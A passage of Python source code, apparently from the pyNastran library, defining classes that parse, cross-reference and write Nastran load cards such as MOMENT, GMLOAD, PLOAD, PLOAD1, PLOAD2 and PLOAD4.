self.mag] + list(self.xyz)\n return list_fields\n\n def repr_fields(self):\n cid = set_blank_if_default(self.Cid(), 0)\n list_fields = ['MOMENT', self.sid, self.node_id, cid,\n self.mag] + list(self.xyz)\n return list_fields\n\n def write_card(self, size=8, is_double=False):\n if size == 8:\n scid = set_string8_blank_if_default(self.Cid(), 0)\n msg = 'MOMENT %8i%8i%8s%8s%8s%8s%8s\\n' % (\n self.sid, self.node_id,\n scid, print_float_8(self.mag), print_float_8(self.xyz[0]),\n print_float_8(self.xyz[1]), print_float_8(self.xyz[2]))\n else:\n scid = set_string16_blank_if_default(self.Cid(), 0)\n if is_double:\n msg = ('MOMENT* %16i%16i%16s%s\\n'\n '* %16s%16s%16s\\n') % (\n self.sid, self.node_id,\n scid, print_scientific_double(self.mag),\n print_scientific_double(self.xyz[0]),\n print_scientific_double(self.xyz[1]),\n print_scientific_double(self.xyz[2]))\n else:\n msg = ('MOMENT* %16i%16i%16s%s\\n'\n '* %16s%16s%16s\\n') % (\n self.sid, self.node_id,\n scid, print_float_16(self.mag), print_float_16(self.xyz[0]),\n print_float_16(self.xyz[1]), print_float_16(self.xyz[2]))\n return self.comment + msg\n\n\nclass MOMENT1(Load1):\n \"\"\"\n Defines a static concentrated moment at a grid point by specifying a\n magnitude and two grid points that determine the direction.\n\n +---------+-----+----+-------+----+----+\n | 1 | 2 | 3 | 4 | 5 | 6 |\n +=========+=====+====+=======+====+====+\n | MOMENT1 | SID | G | M | G1 | G2 |\n +---------+-----+----+-------+----+----+\n | MOMENT1 | 6 | 13 | -2.93 | 16 | 13 |\n +---------+-----+----+-------+----+----+\n \"\"\"\n type = 'MOMENT1'\n\n def __init__(self, sid, node, mag, g1, g2, comment=''):\n \"\"\"\n Creates a MOMENT1 card\n\n Parameters\n ----------\n sid : int\n load id\n node : int\n the node to apply the load to\n mag : float\n the load's magnitude\n n1 / n2 : int / int\n defines the load direction\n n = n2 - n1\n comment : str; default=''\n a comment for the card\n \"\"\"\n Load1.__init__(self, sid, node, mag, g1, g2, comment)\n #Moment.__init__(self)\n\n\nclass MOMENT2(Load2):\n \"\"\"\n Defines a static concentrated moment at a grid point by specification\n of a magnitude and four grid points that determine the direction.\n\n +---------+-----+---+---+----+----+----+----+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |\n +=========+=====+===+===+====+====+====+====+\n | MOMENT2 | SID | G | M | G1 | G2 | G3 | G4 |\n +---------+-----+---+---+----+----+----+----+\n \"\"\"\n type = 'MOMENT2'\n def __init__(self, sid, node, mag, g1, g2, g3, g4, comment=''):\n Load2.__init__(self, sid, node, mag, g1, g2, g3, g4, comment)\n\n\nclass GMLOAD(Load):\n \"\"\"\n Defines a static concentrated force at a grid point by specification of a\n magnitude and two grid points that determine the direction.\n \"\"\"\n type = 'GMLOAD'\n\n def __init__(self, sid, normal, entity, entity_id, method,\n load_magnitudes, cid=0, comment=''):\n \"\"\"Creates a GMLOAD object\"\"\"\n Load.__init__(self)\n if comment:\n self.comment = comment\n self.sid = sid\n self.cid = cid\n self.normal = normal\n self.entity = entity\n self.entity_id = entity_id\n self.method = method\n self.load_magnitudes = load_magnitudes\n self.cid_ref = None\n\n @classmethod\n def add_card(cls, card, comment=''):\n \"\"\"\n Adds a GMLOAD card from ``BDF.add_card(...)``\n\n Parameters\n ----------\n card : BDFCard()\n a BDFCard object\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = integer(card, 1, 'sid')\n cid = integer_or_blank(card, 2, 'cid', 0)\n normal = array([\n double_or_blank(card, 3, 'N1', 0.),\n double_or_blank(card, 4, 'N2', 0.),\n double_or_blank(card, 5, 'N3', 1.),\n ])\n entity = string(card, 6, 'entity')\n entity_id = integer(card, 7, 'entity_id')\n method = string(card, 8, 'method')\n\n load_magnitudes = []\n for i in range(9, len(card)):\n ifield = i - 8\n load_mag = integer_or_double(card, i, 'load_magnitude_%s' % ifield)\n load_magnitudes.append(load_mag)\n return GMLOAD(sid, normal, entity, entity_id, method,\n load_magnitudes, cid=cid, comment=comment)\n\n #def DEquation(self):\n #if isinstance(self.dequation, int):\n #return self.dequation\n #return self.dequation.equation_id\n\n def cross_reference(self, model):\n \"\"\"\n Cross links the card so referenced cards can be extracted directly\n\n Parameters\n ----------\n model : BDF()\n the BDF object\n \"\"\"\n msg = ', which is required by GMLOAD sid=%s' % self.sid\n self.cid_ref = model.Coord(self.Cid(), msg=msg)\n #self.node = model.Node(self.node, msg=msg)\n #self.g1 = model.Node(self.g1, msg=msg)\n #self.g2 = model.Node(self.g2, msg=msg)\n #self.xyz = self.g2.get_position() - self.g1.get_position()\n #normalize(self, msg)\n\n def safe_cross_reference(self, model, xref_errors):\n msg = ', which is required by GMLOAD sid=%s' % self.sid\n self.cid_ref = model.safe_coord(self.Cid(), self.sid, xref_errors, msg=msg)\n\n def uncross_reference(self):\n self.cid = self.Cid()\n self.cid_ref = None\n\n def Cid(self):\n if self.cid_ref is not None:\n return self.cid_ref.cid\n return self.cid\n\n #def G1(self):\n #if isinstance(self.g1, (integer_types, float)):\n #return self.g1\n #return self.g1_ref.nid\n\n #def G2(self):\n #if isinstance(self.g2, (integer_types, float)):\n #return self.g2\n #return self.g2_ref.nid\n\n #def NodeID(self):\n #if isinstance(self.node, integer_types):\n #return self.node\n #return self.node_ref.nid\n\n def get_loads(self):\n return [self]\n\n def raw_fields(self):\n list_fields = ['GMLOAD', self.sid, self.Cid()] + list(self.normal) + [\n self.entity, self.entity_id, self.method] + self.load_magnitudes\n return list_fields\n\n def repr_fields(self):\n return self.raw_fields()\n\n def write_card(self, size=8, is_double=False):\n # type: (int, bool) -> str\n \"\"\"\n The writer method used by BDF.write_card()\n\n Parameters\n -----------\n size : int; default=8\n the size of the card (8/16)\n \"\"\"\n card = self.raw_fields()\n if size == 8:\n return self.comment + print_card_8(card)\n if is_double:\n return self.comment + print_card_double(card)\n return self.comment + print_card_16(card)\n\n\nclass PLOAD(Load):\n \"\"\"\n Static Pressure Load\n\n Defines a uniform static pressure load on a triangular or quadrilateral surface\n comprised of surface elements and/or the faces of solid elements.\n\n +-------+-----+------+----+----+----+----+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 |\n +=======+=====+======+====+====+====+====+\n | PLOAD | SID | P | G1 | G2 | G3 | G4 |\n +-------+-----+------+----+----+----+----+\n | PLOAD | 1 | -4.0 | 16 | 32 | 11 | |\n +-------+-----+------+----+----+----+----+\n \"\"\"\n type = 'PLOAD'\n\n def __init__(self, sid, pressure, nodes, comment=''):\n \"\"\"\n Creates a PLOAD card, which defines a uniform pressure load on a\n shell/solid face or arbitrarily defined quad/tri face.\n\n Parameters\n ----------\n sid : int\n load id\n pressure : float\n the pressure to apply\n nodes : List[int]\n The nodes that are used to define the normal are defined\n using the same method as the CTRIA3/CQUAD4 normal.\n n = 3 or 4\n comment : str; default=''\n a comment for the card\n \"\"\"\n if comment:\n self.comment = comment\n self.sid = sid\n self.pressure = pressure\n self.nodes = nodes\n assert len(self.nodes) in [3, 4], 'nodes=%s' % self.nodes\n\n @classmethod\n def add_card(cls, card, comment=''):\n \"\"\"\n Adds a PLOAD card from ``BDF.add_card(...)``\n\n Parameters\n ----------\n card : BDFCard()\n a BDFCard object\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = integer(card, 1, 'sid')\n pressure = double(card, 2, 'pressure')\n nodes = [integer(card, 3, 'n1'),\n integer(card, 4, 'n2'),\n integer(card, 5, 'n3')]\n n4 = integer_or_blank(card, 6, 'n4', 0)\n if n4:\n nodes.append(n4)\n assert len(card) <= 7, 'len(PLOAD card) = %i\\ncard=%s' % (len(card), card)\n return PLOAD(sid, pressure, nodes, comment=comment)\n\n @classmethod\n def add_op2_data(cls, data, comment=''):\n \"\"\"\n Adds a PLOAD card from the OP2\n\n Parameters\n ----------\n data : List[varies]\n a list of fields defined in OP2 format\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = data[0]\n pressure = data[1]\n nodes = data[2:]\n if nodes[-1] == 0:\n nodes = list(nodes)\n nodes.pop()\n return PLOAD(sid, pressure, nodes, comment=comment)\n\n def cross_reference(self, model):\n \"\"\"\n Cross links the card so referenced cards can be extracted directly\n\n Parameters\n ----------\n model : BDF()\n the BDF object\n \"\"\"\n pass\n\n def safe_cross_reference(self, model, safe_coord):\n return self.cross_reference(model)\n\n def uncross_reference(self):\n pass\n\n def get_loads(self):\n return [self]\n\n def raw_fields(self):\n list_fields = ['PLOAD', self.sid, self.pressure] + self.node_ids\n return list_fields\n\n def repr_fields(self):\n return self.raw_fields()\n\n def write_card(self, size=8, is_double=False):\n # type: (int, bool) -> str\n \"\"\"\n The writer method used by BDF.write_card()\n\n Parameters\n -----------\n size : int; default=8\n the size of the card (8/16)\n \"\"\"\n card = self.raw_fields()\n if size == 8:\n return self.comment + print_card_8(card)\n if is_double:\n return self.comment + print_card_double(card)\n return self.comment + print_card_16(card)\n\n\nclass PLOAD1(Load):\n \"\"\"\n Applied Load on CBAR, CBEAM or CBEND Elements\n\n Defines concentrated, uniformly distributed, or linearly distributed\n applied loads to the CBAR or CBEAM elements at user-chosen points\n along the axis. For the CBEND element, only distributed loads over\n an entire length may be defined.\n\n +--------+-----+------+------+-------+-----+-------+-----+-------+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |\n +========+=====+======+======+=======+=====+=======+=====+=======+\n | PLOAD1 | SID | EID | TYPE | SCALE | X1 | P1 | X2 | P2 |\n +--------+-----+------+------+-------+-----+-------+-----+-------+\n | PLOAD1 | 25 | 1065 | MY | FRPR | 0.2 | 2.5E3 | 0.8 | 3.5E3 |\n +--------+-----+------+------+-------+-----+-------+-----+-------+\n \"\"\"\n type = 'PLOAD1'\n valid_types = ['FX', 'FY', 'FZ', 'FXE', 'FYE', 'FZE',\n 'MX', 'MY', 'MZ', 'MXE', 'MYE', 'MZE']\n\n # LE: length-based; FR: fractional; PR:projected\n valid_scales = ['LE', 'FR', 'LEPR', 'FRPR']\n\n def __init__(self, sid, eid, load_type, scale, x1, p1, x2=None, p2=None, comment=''):\n \"\"\"\n Creates a PLOAD1 card, which may be applied to a CBAR/CBEAM\n\n Parameters\n ----------\n sid : int\n load id\n eid : int\n element to apply the load to\n load_type : str\n type of load that's applied\n valid_types = {FX, FY, FZ, FXE, FYE, FZE,\n MX, MY, MZ, MXE, MYE, MZE}\n scale : float\n local pressure scaling factor\n x1 / x2 : float / float\n the starting/end position for the load application\n the default for x2 is x1\n p1 / p2 : float / float\n the magnitude of the load at x1 and x2\n the default for p2 is p1\n comment : str; default=''\n a comment for the card\n\n Point Load : x1 == x2\n Distributed Load : x1 != x2\n \"\"\"\n if comment:\n self.comment = comment\n if x2 is None:\n x2 = x1\n if p2 is None:\n p2 = p1\n self.sid = sid\n self.eid = eid\n self.load_type = load_type\n self.scale = scale\n self.x1 = x1\n self.p1 = p1\n self.x2 = x2\n self.p2 = p2\n self.eid_ref = None\n\n @property\n def Type(self):\n return self.load_type\n\n @Type.setter\n def Type(self, load_type):\n self.load_type = load_type\n\n @classmethod\n def add_card(cls, card, comment=''):\n \"\"\"\n Adds a PLOAD1 card from ``BDF.add_card(...)``\n\n Parameters\n ----------\n card : BDFCard()\n a BDFCard object\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = integer(card, 1, 'sid')\n eid = integer(card, 2, 'eid')\n load_type = string(card, 3, 'Type (\"%s\")' % '\", \"'.join(cls.valid_types))\n scale = string(card, 4, 'scale (\"%s\")' % '\", \"'.join(cls.valid_scales))\n x1 = double(card, 5, 'x1')\n p1 = double(card, 6, 'p1')\n x2 = double_or_blank(card, 7, 'x2', x1)\n p2 = double_or_blank(card, 8, 'p2', p1)\n assert len(card) <= 9, 'len(PLOAD1 card) = %i\\ncard=%s' % (len(card), card)\n return PLOAD1(sid, eid, load_type, scale, x1, p1, x2, p2, comment=comment)\n\n @classmethod\n def add_op2_data(cls, data, comment=''):\n \"\"\"\n Adds a PLOAD1 card from the OP2\n\n Parameters\n ----------\n data : List[varies]\n a list of fields defined in OP2 format\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = data[0]\n eid = data[1]\n load_type = data[2]\n scale = data[3]\n x1 = data[4]\n p1 = data[5]\n x2 = data[6]\n p2 = data[7]\n load_type = cls.valid_types[load_type - 1]\n scale = cls.valid_scales[scale - 1]\n return PLOAD1(sid, eid, load_type, scale, x1, p1, x2, p2, comment=comment)\n\n def validate(self):\n if self.load_type not in self.valid_types:\n msg = '%s is an invalid type on the PLOAD1 card; valid_types=[%s]' % (\n self.load_type, ', '.join(self.valid_types).rstrip(', '))\n raise RuntimeError(msg)\n if self.scale not in self.valid_scales:\n msg = '%s is an invalid scale on the PLOAD1 card; valid_scales=[%s]' % (\n self.scale, ', '.join(self.valid_scales).rstrip(', '))\n raise RuntimeError(msg)\n\n assert 0.0 <= self.x1 <= self.x2, '0.0 <= x1 <= x2 -> x1=%s x2=%s' % (self.x1, self.x2)\n if self.scale in ['FR', 'FRPR']:\n assert self.x1 <= 1.0, 'x1=%r' % self.x1\n assert self.x2 <= 1.0, 'x2=%r' % self.x2\n if self.scale not in self.valid_scales:\n msg = '%s is an invalid scale on the PLOAD1 card; valid_scales=[%s]' % (\n self.scale, ', '.join(self.valid_scales))\n raise RuntimeError(msg)\n\n def cross_reference(self, model):\n \"\"\"\n Cross links the card so referenced cards can be extracted directly\n\n Parameters\n ----------\n model : BDF()\n the BDF object\n \"\"\"\n msg = ', which is required by PLOAD1 sid=%s' % self.sid\n self.eid_ref = model.Element(self.eid, msg=msg)\n\n def safe_cross_reference(self, model, safe_coord):\n return self.cross_reference(model)\n\n def uncross_reference(self):\n self.eid = self.Eid()\n self.eid_ref = None\n\n def transform_load(self):\n p1 = self.eid_ref.ga_ref.get_position()\n p2 = self.eid_ref.gb_ref.get_position()\n\n g0 = self.eid_ref.g0_vector\n #if not isinstance(g0, ndarray):\n #g0 = g0.get_position()\n\n x = p2 - p1\n y = p1 - g0\n z = cross(x, y)\n A = [x, y, z]\n #g = self.GravityVector()\n return A\n #(g2, matrix) = self.cid.transformToGlobal(A)\n #return (g2)\n\n #def get_reduced_loads(self, resolve_load_card=False, filter_zero_scale_factors=False):\n #\"\"\"\n #Get all load objects in a simplified form, which means all\n #scale factors are already applied and only base objects\n #(no LOAD cards) will be returned.\n\n #.. todo:: lots more object types to support\n #\"\"\"\n #scale_factors = [1.0]\n #loads = [self]\n #return scale_factors, loads\n\n def get_loads(self):\n return [self]\n\n def Eid(self):\n if self.eid_ref is not None:\n return self.eid_ref.eid\n return self.eid\n\n def raw_fields(self):\n list_fields = ['PLOAD1', self.sid, self.Eid(), self.load_type, self.scale,\n self.x1, self.p1, self.x2, self.p2]\n return list_fields\n\n def repr_fields(self):\n return self.raw_fields()\n\n def write_card(self, size=8, is_double=False):\n # type: (int, bool) -> str\n \"\"\"\n The writer method used by BDF.write_card()\n\n Parameters\n -----------\n size : int; default=8\n the size of the card (8/16)\n \"\"\"\n card = self.raw_fields()\n if size == 8:\n return self.comment + print_card_8(card)\n if is_double:\n return self.comment + print_card_double(card)\n return self.comment + print_card_16(card)\n\n\nclass PLOAD2(Load):\n \"\"\"\n +--------+-----+------+------+------+------+------+------+------+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |\n +========+=====+======+======+======+=============+======+======+\n | PLOAD2 | SID | P | EID1 | EID2 | EID3 | EID4 | EID5 | EID6 |\n +--------+-----+------+------+------+------+------+------+------+\n | PLOAD2 | 21 | -3.6 | 4 | 16 | 2 | | | |\n +--------+-----+------+------+------+------+------+------+------+\n | PLOAD2 | SID | P | EID1 | THRU | EID2 | | | |\n +--------+-----+------+------+------+------+------+------+------+\n \"\"\"\n type = 'PLOAD2'\n\n def __init__(self, sid, pressure, eids, comment=''):\n \"\"\"\n Creates a PLOAD2 card, which defines an applied load normal to the quad/tri face\n\n Parameters\n ----------\n sid : int\n load id\n pressure : float\n the pressure to apply to the elements\n eids : List[int]\n the elements to apply pressure to\n n < 6 or a continouus monotonic list of elements (e.g., [1, 2, ..., 1000])\n comment : str; default=''\n a comment for the card\n \"\"\"\n if comment:\n self.comment = comment\n if isinstance(eids, integer_types):\n self.eids = [eids]\n self.sid = sid\n self.pressure = pressure\n self.eids = eids\n self.eids_ref = None\n\n @classmethod\n def add_card(cls, card, comment=''):\n \"\"\"\n Adds a PLOAD2 card from ``BDF.add_card(...)``\n\n Parameters\n ----------\n card : BDFCard()\n a BDFCard object\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = integer(card, 1, 'sid')\n pressure = double(card, 2, 'p')\n\n if integer_string_or_blank(card, 4, 'THRU') == 'THRU':\n e1 = integer(card, 3, 'Element1')\n e2 = integer(card, 5, 'Element1')\n eids = [i for i in range(e1, e2 + 1)]\n assert len(card) == 6, 'len(PLOAD2 card) = %i\\ncard=%s' % (len(card), card)\n else:\n eids = fields(integer, card, 'eid', i=3, j=len(card))\n return PLOAD2(sid, pressure, eids, comment=comment)\n\n @classmethod\n def add_op2_data(cls, data, comment=''):\n \"\"\"\n Adds a PLOAD2 card from the OP2\n\n Parameters\n ----------\n data : List[varies]\n a list of fields defined in OP2 format\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = data[0]\n pressure = data[1]\n eids = list(data[2:])\n return PLOAD2(sid, pressure, eids, comment=comment)\n\n def cross_reference(self, model):\n \"\"\"\n Cross links the card so referenced cards can be extracted directly\n\n Parameters\n ----------\n model : BDF()\n the BDF object\n \"\"\"\n msg = ', which is required by PLOAD2 sid=%s' % self.sid\n self.eids_ref = model.Elements(self.eids, msg=msg)\n\n def safe_cross_reference(self, model, safe_coord):\n return self.cross_reference(model)\n\n def uncross_reference(self):\n self.eids = self.element_ids\n self.eids_ref = None\n\n @property\n def element_ids(self):\n if self.eids_ref is not None:\n eids = [elem.eid for elem in self.eids_ref]\n else:\n eids = self.eids\n return self.eids\n\n def get_loads(self):\n return [self]\n\n def raw_fields(self):\n list_fields = ['PLOAD2', self.sid, self.pressure]\n eids = self.element_ids\n if len(eids) == 1:\n list_fields += eids\n else:\n eids.sort()\n delta_eid = eids[-1] - eids[0] + 1\n if delta_eid != len(eids):\n msg = 'eids=%s len(eids)=%s delta_eid=%s must be continuous' % (\n eids, len(eids), delta_eid)\n raise RuntimeError(msg)\n #list_fields += eids\n list_fields += [eids[0], 'THRU', eids[-1]]\n return list_fields\n\n def repr_fields(self):\n return self.raw_fields()\n\n def write_card(self, size=8, is_double=False):\n # type: (int, bool) -> str\n \"\"\"\n The writer method used by BDF.write_card()\n\n Parameters\n -----------\n size : int; default=8\n the size of the card (8/16)\n \"\"\"\n card = self.raw_fields()\n if size == 8:\n return self.comment + print_card_8(card)\n if is_double:\n return self.comment + print_card_double(card)\n return self.comment + print_card_16(card)\n\n#def PLOAD4_func(self, sid, eids, pressures,\n #g1=None, g34=None, cid=0, nvector=None, surf_or_line='SURF',\n #line_load_dir='NORM', comment=''):\n #\"\"\"\n #Creates a PLOAD4 card\n\n #Solid Format\n #============\n #Defines a pressure load on a face of a CHEXA, CPENTA, or CTETRA element.\n\n #+--------+-----+-----+----+----+------+------+------+-------+\n #| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |\n #+========+=====+=====+====+====+======+======+======+=======+\n #| PLOAD4 | SID | EID | P1 | P2 | P3 | P4 | G1 | G3/G4 |\n #+--------+-----+-----+----+----+------+------+------+-------+\n #| | CID | N1 | N2 | N3 | SORL | LDIR | | |\n #+--------+-----+-----+----+----+------+------+------+-------+\n\n #Shell Format\n #============\n #Defines a pressure load on a face of a CTRIA3, CTRIA6, CTRIAR,\n #CQUAD4, CQUAD8, or CQUADR element.\n #+--------+-----+-----+----+----+------+------+------+-------+\n #| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |\n #+========+=====+=====+====+====+======+======+======+=======+\n #| PLOAD4 | SID | EID | P1 | P2 | P3 | P4 | THRU | EID2 |\n #+--------+-----+-----+----+----+------+------+------+-------+\n #| | CID | N1 | N2 | N3 | SORL | LDIR | | |\n #+--------+-----+-----+----+----+------+------+------+-------+\n\n #.. warning:: NX does not support SORL and LDIR, MSC does\n #\"\"\"\n #if g34 is None:\n #return PLOAD4Solid(\n #sid, eids, pressures,\n #g1=None, g34=None, cid=0, nvector=None, surf_or_line='SURF',\n #line_load_dir='NORM', comment='')\n #return PLOAD4Shell(\n #sid, eids, pressures, cid=0, nvector=None, surf_or_line='SURF',\n #line_load_dir='NORM', comment='')\n\n\n#class PLOAD4Shell(PLOAD4):\n #def __init__(self, sid, eids, pressures, g1=None, g34=None, cid=0,\n #nvector=None, surf_or_line='SURF',\n #line_load_dir='NORM', comment=''):\n #PLOAD4.__init__(self, sid, eids, pressures, g1=None, g34=None,\n #cid=0, nvector=None,\n #surf_or_line='SURF',\n #line_load_dir='NORM',\n #comment='')\n#class PLOAD4Shell(PLOAD4):\n #def __init__(self, sid, eids, pressures, g1=None, g34=None, cid=0,\n #nvector=None, surf_or_line='SURF',\n #line_load_dir='NORM', comment=''):\n #PLOAD4.__init__(self, sid, eids, pressures, g1=g1, g34=g34,\n #cid=cid, nvector=nvector,\n #surf_or_line=surf_or_line,\n #line_load_dir=line_load_dir,\n #comment=comment)\n\nclass PLOAD4(Load):\n \"\"\"\n Solid Format\n ============\n Defines a pressure load on a face of a CHEXA, CPENTA, or CTETRA element.\n\n +--------+-----+-----+----+----+------+------+------+-------+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |\n +========+=====+=====+====+====+======+======+======+=======+\n | PLOAD4 | SID | EID | P1 | P2 | P3 | P4 | G1 | G3/G4 |\n +--------+-----+-----+----+----+------+------+------+-------+\n | | CID | N1 | N2 | N3 | SORL | LDIR | | |\n +--------+-----+-----+----+----+------+------+------+-------+\n\n Shell Format\n ============\n Defines a pressure load on a face of a CTRIA3, CTRIA6, CTRIAR,\n CQUAD4, CQUAD8, or CQUADR element.\n\n +--------+-----+-----+----+----+------+------+------+-------+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |\n +========+=====+=====+====+====+======+======+======+=======+\n | PLOAD4 | SID | EID | P1 | P2 | P3 | P4 | THRU | EID2 |\n +--------+-----+-----+----+----+------+------+------+-------+\n | | CID | N1 | N2 | N3 | SORL | LDIR | | |\n +--------+-----+-----+----+----+------+------+------+-------+\n\n .. warning:: NX does not support SORL and LDIR, MSC does\n \"\"\"\n type = 'PLOAD4'\n\n def __init__(self, sid, eids, pressures, g1, g34,\n cid=0, nvector=None, surf_or_line='SURF',\n line_load_dir='NORM', comment=''):\n \"\"\"\n Creates a PLOAD4 card\n\n Parameters\n ----------\n sid : int\n the load id\n eids : List[int, ...]\n shells : the range of element ids; must be sequential\n solids : must be length 1\n pressures : List[float, float, float, float]\n tri : must be length 4 (the last value should be the same as the 0th value)\n quad : must be length 4\n g1 : int/None\n only used for solid elements\n g34 : int / None\n only used for solid elements\n cid : int; default=0\n the coordinate system for ???\n nvector : (3, ) float ndarray\n blank : load acts normal to the face\n the local pressure vector\n surf_or_line : str; default='SURF'\n SURF : surface load\n LINE : line load (only defined for QUADR, TRIAR)\n not supported\n line_load_dir : str; default='NORM'\n direction of the line load (see surf_or_line); {X, Y, Z, TANG, NORM}\n not supported\n comment : str; default=''\n a comment for the card\n\n TODO: fix the way \"pressures\" works\n \"\"\"\n if nvector is None:\n nvector = np.zeros(3, dtype='float64')\n else:\n nvector = np.asarray(nvector, dtype='float64')\n\n if comment:\n self.comment = comment\n if isinstance(eids, integer_types):\n eids = [eids]\n if isinstance(eids, float_types):\n pressures = [pressures] * 4\n # TODO: handle default pressure as input\n\n self.sid = sid\n\n # these can be greater than 1 if it's a shell (not a solid)\n self.eids = eids\n self.pressures = np.asarray(pressures)\n\n #: used for solid element only\n self.g1 = g1\n #: g3/g4 - different depending on CHEXA/CPENTA or CTETRA\n self.g34 = g34\n\n #: Coordinate system identification number. See Remark 2.\n #: (Integer >= 0;Default=0)\n self.cid = cid\n self.nvector = nvector\n\n # flag with values of SURF/LINE\n self.surf_or_line = surf_or_line\n\n # Line load direction\n #\n # 1. X, Y, Z : line load in x/y/z in the element coordinate\n # system\n # 2. TANG : line load is tangent to the edge pointing\n # from G1 to G2\n # 3. NORM : line load is in the mean plane, normal to the\n # edge and pointing outwards from the element\n #\n # if cid=N123 = 0: line_load_dir_default=NORM\n self.line_load_dir = line_load_dir\n #self.eid_ref = None\n self.g1_ref = None\n self.g34_ref = None\n self.cid_ref = None\n self.eids_ref = None\n\n def validate(self):\n if self.surf_or_line not in ['SURF', 'LINE']:\n raise RuntimeError('PLOAD4; sid=%s surf_or_line=%r' % (self.sid, self.surf_or_line))\n if self.line_load_dir not in ['LINE', 'X', 'Y', 'Z', 'TANG', 'NORM']:\n raise RuntimeError(self.line_load_dir)\n assert self.g1 != 0, str(self)\n assert self.g34 != 0, str(self)\n\n @classmethod\n def add_card(cls, card, comment=''):\n \"\"\"\n Adds a PLOAD4 card from ``BDF.add_card(...)``\n\n Parameters\n ----------\n card : BDFCard()\n a BDFCard object\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = integer(card, 1, 'sid')\n eid = integer(card, 2, 'eid')\n p1 = double_or_blank(card, 3, 'p1', 0.0)\n pressures = [\n p1,\n double_or_blank(card, 4, 'p2', p1),\n double_or_blank(card, 5, 'p3', p1),\n double_or_blank(card, 6, 'p4', p1)]\n\n eids = [eid]\n g1_thru = integer_string_or_blank(card, 7, 'g1/THRU')\n if g1_thru == 'THRU' and integer_or_blank(card, 8, 'eid2'):\n # alternate form\n eid2 = integer(card, 8, 'eid2')\n if eid2:\n eids = list(unique(\n expand_thru([eid, 'THRU', eid2], set_fields=False, sort_fields=False)\n ))\n g1 = None\n g34 = None\n else:\n # standard form\n eids = [eid]\n g1 = integer_or_blank(card, 7, 'g1')\n g34 = integer_or_blank(card, 8, 'g34')\n\n cid = integer_or_blank(card, 9, 'cid', 0)\n nvector = array([double_or_blank(card, 10, 'N1', 0.0),\n double_or_blank(card, 11, 'N2', 0.0),\n double_or_blank(card, 12, 'N3', 0.0)])\n surf_or_line = string_or_blank(card, 13, 'sorl', 'SURF')\n line_load_dir = string_or_blank(card, 14, 'ldir', 'NORM')\n assert len(card) <= 15, 'len(PLOAD4 card) = %i\\ncard=%s' % (len(card), card)\n return PLOAD4(sid, eids, pressures, g1, g34, cid, nvector,\n surf_or_line, line_load_dir, comment=comment)\n\n @classmethod\n def add_op2_data(cls, data, comment=''):\n \"\"\"\n Adds a PLOAD4 card from the OP2\n\n Parameters\n ----------\n data : List[varies]\n a list of fields defined in OP2 format\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = data[0]\n eid = data[1]\n pressures = data[2]\n\n g1 = data[3]\n g34 = data[4]\n if g1 == 0:\n g1 = None\n if g34 == 0:\n g34 = None\n cid = data[5]\n nvector = data[6]\n\n surf_or_line = data[7]\n\n eids = [eid]\n if data[7] is None:\n surf_or_line = 'SURF'\n assert data[8] is None, data\n line_load_dir = 'NORM'\n else:\n surf_or_line = data[7]\n line_load_dir = data[8]\n pload4 = PLOAD4(sid, eids, pressures, g1, g34, cid, nvector,\n surf_or_line, line_load_dir, comment=comment)\n assert sid < 10000000, pload4\n assert cid < 10000000, pload4\n return pload4\n\n def get_loads(self):\n return [self]\n\n def transform_load(self):\n \"\"\"\n Considers single elememnts\n\n .. warning:: surf_or_line=SURF is supported (not LINE)\n .. warning:: line_load_dir=NORM is supported (not X,Y,Z)\n \"\"\"\n if self.surf_or_line != 'SURF':\n msg = ('Only surface loads are supported. '\n 'required_surf_or_line=SURF. actual=%r' % self.surf_or_line)\n raise RuntimeError(msg)\n if self.line_load_dir != 'NORM':\n msg = ('Only normal loads are supported. '\n 'required_line_load_dir=NORM. actual=%r' % self.line_load_dir)\n raise RuntimeError(msg)\n if len(self.eids) != 1:\n msg = 'Only one load may be defined on each PLOAD4. nLoads=%s\\n%s' % (\n len(self.eids), str(self))\n raise RuntimeError(msg)\n\n elem = self.eids_ref[0]\n if self.g1 and self.g34: # solid elements\n nid = self.g1_ref.nid\n nid_opposite = self.g34_ref.nid\n (face_node_ids, area) = elem.get_face_nodes_and_area(self, nid, nid_opposite)\n else:\n face_node_ids = elem.node_ids\n area = elem.Area()\n n = len(face_node_ids)\n\n if self.surf_or_line != 'SURF':\n if norm(self.nvector) != 0.0 or self.cid != 0:\n vector = self.nvector / np.linalg.norm(self.nvector)\n assert self.Cid() == 0, 'cid=%r on a PLOAD4 is not supported\\n%s' % (self.Cid(), str(self))\n else:\n # normal pressure\n assert len(self.eids_ref) == 1, 'only 1 element is supported by transform_load on PLOAD4\\n%s' % (str(self))\n elem = self.eids_ref[0]\n vector = array(elem.Normal())\n else:\n raise NotImplementedError('surf_or_line=%r on PLOAD4 is not supported\\n%s' % (\n self.surf_or_line, str(self)))\n\n vectors = []\n for (nid, p) in zip(face_node_ids, self.pressures):\n vectors.append(vector * p * area / n) # Force_i\n is_load = None\n return (is_load, face_node_ids, vectors)\n\n def Cid(self):\n \"\"\"gets the coordinate system object\"\"\"\n if self.cid_ref is not None:\n return self.cid_ref.cid\n return self.cid\n\n def cross_reference(self, model):\n \"\"\"\n Cross links the card so referenced cards can be extracted directly\n\n Parameters\n ----------\n model : BDF()\n the BDF object\n \"\"\"\n msg = ', which is required by PLOAD4 sid=%s' % self.sid\n self.cid_ref = model.Coord(self.cid, msg=msg)\n if self.g1 is not None:\n self.g1_ref = model.Node(self.g1, msg=msg + '; g1')\n if self.g34 is not None:\n self.g34_ref = model.Node(self.g34, msg=msg + '; g34')\n if self.eids:\n self.eids_ref = model.Elements(self.eids, msg=msg)\n\n def 